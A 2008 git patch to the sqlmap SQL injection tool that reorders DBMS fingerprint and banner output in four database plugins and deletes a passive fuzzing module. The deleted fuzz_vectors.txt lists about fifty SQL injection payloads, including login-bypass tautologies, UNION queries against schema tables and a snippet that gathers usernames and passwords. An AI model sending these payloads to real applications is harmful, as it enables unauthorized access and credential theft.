From 66fb3c3033b216076530bba3c8cee2331cc96a75 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 17 Nov 2008 11:22:03 +0000 Subject: [PATCH] Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing. --- lib/utils/fuzzer.py | 43 ------------------------------- plugins/dbms/mssqlserver.py | 34 ++++++++++++++----------- plugins/dbms/mysql.py | 40 +++++++++++++++++++---------- plugins/dbms/oracle.py | 32 +++++++++++++---------- plugins/dbms/postgresql.py | 32 +++++++++++++---------- txt/fuzz_vectors.txt | 51 ------------------------------------- xml/banner/generic.xml | 16 ++++++++++++ 7 files changed, 99 insertions(+), 149 deletions(-) delete mode 100644 lib/utils/fuzzer.py delete mode 100644 txt/fuzz_vectors.txt diff --git a/lib/utils/fuzzer.py b/lib/utils/fuzzer.py deleted file mode 100644 index ad9647c3b..000000000 --- a/lib/utils/fuzzer.py +++ /dev/null @@ -1,43 +0,0 @@ -#!/usr/bin/env python - -""" -$Id$ - -This file is part of the sqlmap project, http://sqlmap.sourceforge.net. - -Copyright (c) 2006-2008 Bernardo Damele A. G. - and Daniele Bellucci - -sqlmap is free software; you can redistribute it and/or modify it under -the terms of the GNU General Public License as published by the Free -Software Foundation version 2 of the License. - -sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY -WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS -FOR A PARTICULAR PURPOSE. See the GNU General Public License for more -details. - -You should have received a copy of the GNU General Public License along -with sqlmap; if not, write to the Free Software Foundation, Inc., 51 -Franklin St, Fifth Floor, Boston, MA 02110-1301 USA -""" - - - -from lib.core.agent import agent -from lib.core.data import logger -from lib.core.data import paths -from lib.request.connect import Connect as Request - - -def passiveFuzzing(): - logMsg = "executing passive fuzzing to retrieve DBMS error messages" - logger.info(logMsg) - - fuzzVectors = open(paths.FUZZ_VECTORS, "r") - - for fuzzVector in fuzzVectors: - fuzzVector = fuzzVector.replace("\r", "").replace("\n", "") - - payload = agent.payload(newValue=fuzzVector) - Request.queryPage(payload) diff --git a/plugins/dbms/mssqlserver.py b/plugins/dbms/mssqlserver.py index 4b52f3455..9be2dab7c 100644 --- a/plugins/dbms/mssqlserver.py +++ b/plugins/dbms/mssqlserver.py @@ -46,7 +46,6 @@ from lib.core.unescaper import unescaper from lib.parse.banner import bannerParser from lib.request import inject from lib.request.connect import Connect as Request -#from lib.utils.fuzzer import passiveFuzzing from plugins.generic.enumeration import Enumeration from plugins.generic.filesystem import Filesystem @@ -124,8 +123,19 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover): def getFingerprint(self): - value = "back-end DBMS: " - actVer = formatDBMSfp() + value = "" + info = None + formatInfo = None + + if self.banner: + info = bannerParser(self.banner) + formatInfo = formatOSfp(info) + + if formatInfo: + value += "%s\n" % formatInfo + + value += "back-end DBMS: " + actVer = formatDBMSfp() if not conf.extensiveFp: value += actVer @@ -135,12 +145,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover): formatInfo = None value += "active fingerprint: %s" % actVer - if self.banner: - info = bannerParser(self.banner) + if info: release = info["dbmsRelease"] version = info["dbmsVersion"] servicepack = info["dbmsServicePack"] - formatInfo = formatOSfp(info) if release and version and servicepack: banVer = "Microsoft SQL Server %s " % release @@ -149,15 +157,11 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover): value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - #passiveFuzzing() htmlErrorFp = getHtmlErrorFp() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - if formatInfo: - value += "\n%s" % formatInfo - return value @@ -165,6 +169,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover): if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit(): setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0]) + if conf.getBanner: + self.banner = inject.getValue("@@VERSION") + if not conf.extensiveFp: return True @@ -172,10 +179,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover): logger.info(logMsg) randInt = str(randomInt(1)) - query = "LTRIM(STR(LEN(%s)))" % randInt + query = "LTRIM(STR(LEN(%s)))" % randInt if inject.getValue(query) == "1": - query = "SELECT SUBSTRING((@@VERSION), 25, 1)" + query = "SELECT SUBSTRING((@@VERSION), 25, 1)" version = inject.getValue(query) if version == "8": @@ -190,9 +197,6 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover): else: setDbms("Microsoft SQL Server") - if not conf.extensiveFp: - return True - if conf.getBanner: self.banner = inject.getValue("@@VERSION") diff --git a/plugins/dbms/mysql.py b/plugins/dbms/mysql.py index b9ba41e7e..05752ef96 100644 --- a/plugins/dbms/mysql.py +++ b/plugins/dbms/mysql.py @@ -47,7 +47,6 @@ from lib.core.unescaper import unescaper from lib.parse.banner import bannerParser from lib.request import inject from lib.request.connect import Connect as Request -#from lib.utils.fuzzer import passiveFuzzing from plugins.generic.enumeration import Enumeration from plugins.generic.filesystem import Filesystem @@ -182,8 +181,19 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover): def getFingerprint(self): - value = "back-end DBMS: " - actVer = formatDBMSfp() + value = "" + info = None + formatInfo = None + + if self.banner: + info = bannerParser(self.banner) + formatInfo = formatOSfp(info) + + if formatInfo: + value += "%s\n" % formatInfo + + value += "back-end DBMS: " + actVer = formatDBMSfp() if not conf.extensiveFp: value += actVer @@ -198,25 +208,21 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover): comVer = formatDBMSfp([comVer]) value += "\n%scomment injection fingerprint: %s" % (blank, comVer) - if self.banner: - info = bannerParser(self.banner) - formatInfo = formatOSfp(info) - + if info: + # TODO: move to the XML banner file banVer = info['version'] + if re.search("-log$", self.banner): banVer += ", logging enabled" + banVer = formatDBMSfp([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - #passiveFuzzing() htmlErrorFp = getHtmlErrorFp() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - if formatInfo: - value += "\n%s" % formatInfo - return value @@ -235,6 +241,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover): if int(kb.dbmsVersion[0]) >= 5: self.has_information_schema = True + if conf.getBanner: + self.banner = inject.getValue("VERSION()") + if not conf.extensiveFp: return True @@ -261,6 +270,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover): setDbms("MySQL 5") self.has_information_schema = True + if conf.getBanner: + self.banner = inject.getValue("VERSION()") + if not conf.extensiveFp: kb.dbmsVersion = [">= 5.0.0"] return True @@ -306,6 +318,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover): setDbms("MySQL 4") kb.dbmsVersion = ["< 5.0.0"] + if conf.getBanner: + self.banner = inject.getValue("VERSION()") + if not conf.extensiveFp: return True @@ -332,9 +347,6 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover): else: kb.dbmsVersion = ["< 3.22.11"] - if conf.getBanner: - self.banner = inject.getValue("VERSION()") - return True else: warnMsg = "the back-end DMBS is not MySQL" diff --git a/plugins/dbms/oracle.py b/plugins/dbms/oracle.py index 6a9a7c773..b72ba78c4 100644 --- a/plugins/dbms/oracle.py +++ b/plugins/dbms/oracle.py @@ -39,7 +39,6 @@ from lib.core.settings import ORACLE_SYSTEM_DBS from lib.core.unescaper import unescaper from lib.parse.banner import bannerParser from lib.request import inject -#from lib.utils.fuzzer import passiveFuzzing from plugins.generic.enumeration import Enumeration from plugins.generic.filesystem import Filesystem @@ -118,7 +117,18 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover): def getFingerprint(self): - value = "back-end DBMS: " + value = "" + info = None + formatInfo = None + + if self.banner: + info = bannerParser(self.banner) + formatInfo = formatOSfp(info) + + if formatInfo: + value += "%s\n" % formatInfo + + value += "back-end DBMS: " if not conf.extensiveFp: value += "Oracle" @@ -129,23 +139,16 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover): formatInfo = None value += "active fingerprint: %s" % actVer - if self.banner: - info = bannerParser(self.banner) - formatInfo = formatOSfp(info) - + if info: banVer = info['version'] banVer = formatDBMSfp([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - #passiveFuzzing() htmlErrorFp = getHtmlErrorFp() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - if formatInfo: - value += "\n%s" % formatInfo - return value @@ -153,6 +156,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover): if conf.dbms in ORACLE_ALIASES: setDbms("Oracle") + if conf.getBanner: + self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1") + if not conf.extensiveFp: return True @@ -177,6 +183,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover): setDbms("Oracle") + if conf.getBanner: + self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1") + if not conf.extensiveFp: return True @@ -189,9 +198,6 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover): elif re.search("^8", version): kb.dbmsVersion = ["8i"] - if conf.getBanner: - self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1") - return True else: warnMsg = "the back-end DMBS is not Oracle" diff --git a/plugins/dbms/postgresql.py b/plugins/dbms/postgresql.py index 2343a1cd4..bc24774b0 100644 --- a/plugins/dbms/postgresql.py +++ b/plugins/dbms/postgresql.py @@ -40,7 +40,6 @@ from lib.core.settings import PGSQL_SYSTEM_DBS from lib.core.unescaper import unescaper from lib.parse.banner import bannerParser from lib.request import inject -#from lib.utils.fuzzer import passiveFuzzing from plugins.generic.enumeration import Enumeration from plugins.generic.filesystem import Filesystem @@ -118,7 +117,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover): def getFingerprint(self): - value = "back-end DBMS: " + value = "" + info = None + formatInfo = None + + if self.banner: + info = bannerParser(self.banner) + formatInfo = formatOSfp(info) + + if formatInfo: + value += "%s\n" % formatInfo + + value += "back-end DBMS: " if not conf.extensiveFp: value += "PostgreSQL" @@ -129,23 +139,16 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover): formatInfo = None value += "active fingerprint: %s" % actVer - if self.banner: - info = bannerParser(self.banner) - formatInfo = formatOSfp(info) - + if info: banVer = info['version'] banVer = formatDBMSfp([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - #passiveFuzzing() htmlErrorFp = getHtmlErrorFp() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - if formatInfo: - value += "\n%s" % formatInfo - return value @@ -157,6 +160,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover): if conf.dbms in PGSQL_ALIASES: setDbms("PostgreSQL") + if conf.getBanner: + self.banner = inject.getValue("VERSION()") + if not conf.extensiveFp: return True @@ -180,6 +186,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover): setDbms("PostgreSQL") + if conf.getBanner: + self.banner = inject.getValue("VERSION()") + if not conf.extensiveFp: return True @@ -215,9 +224,6 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover): else: kb.dbmsVersion = ["< 6.2.0"] - if conf.getBanner: - self.banner = inject.getValue("VERSION()") - return True else: warnMsg = "the back-end DMBS is not PostgreSQL" diff --git a/txt/fuzz_vectors.txt b/txt/fuzz_vectors.txt deleted file mode 100644 index 428e2ef9a..000000000 --- a/txt/fuzz_vectors.txt +++ /dev/null @@ -1,51 +0,0 @@ -'||(elt(-3+5,bin(15),ord(10),hex(char(45)))) -||6 -'||'6 -(||6) -' OR 1=1-- -OR 1=1 -' OR '1'='1 -; OR '1'='1' -%22+or+isnull%281%2F0%29+%2F* -%27+OR+%277659%27%3D%277659 -%22+or+isnull%281%2F0%29+%2F* -%27+--+ -' or 1=1-- -" or 1=1-- -' or 1=1 /* -or 1=1-- -' or 'a'='a -" or "a"="a -') or ('a'='a -Admin' OR ' -'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES-- -) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES; -' having 1=1-- -' having 1=1-- -' group by userid having 1=1-- -' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')-- -' or 1 in (select @@version)-- -' union all select @@version-- -' OR 'unusual' = 'unusual' -' OR 'something' = 'some'+'thing' -' OR 'text' = N'text' -' OR 'something' like 'some%' -' OR 2 > 1 -' OR 'text' > 't' -' OR 'whatever' in ('whatever') -' OR 2 BETWEEN 1 and 3 -' or username like char(37); -' union select * from users where login = char(114,111,111,116); -' union select -Password:*/=1-- -UNI/**/ON SEL/**/ECT -'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' -'; EXEC ('SEL' + 'ECT US' + 'ER') -'/**/OR/**/1/**/=/**/1 -' or 1/* -+or+isnull%281%2F0%29+%2F* -%27+OR+%277659%27%3D%277659 -%22+or+isnull%281%2F0%29+%2F* -%27+--+&password= -'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > - @var select @var as var into temp end -- diff --git a/xml/banner/generic.xml b/xml/banner/generic.xml index cf460474f..4e06fc708 100644 --- a/xml/banner/generic.xml +++ b/xml/banner/generic.xml @@ -6,18 +6,34 @@ + + + + + + + + + + + + + + + +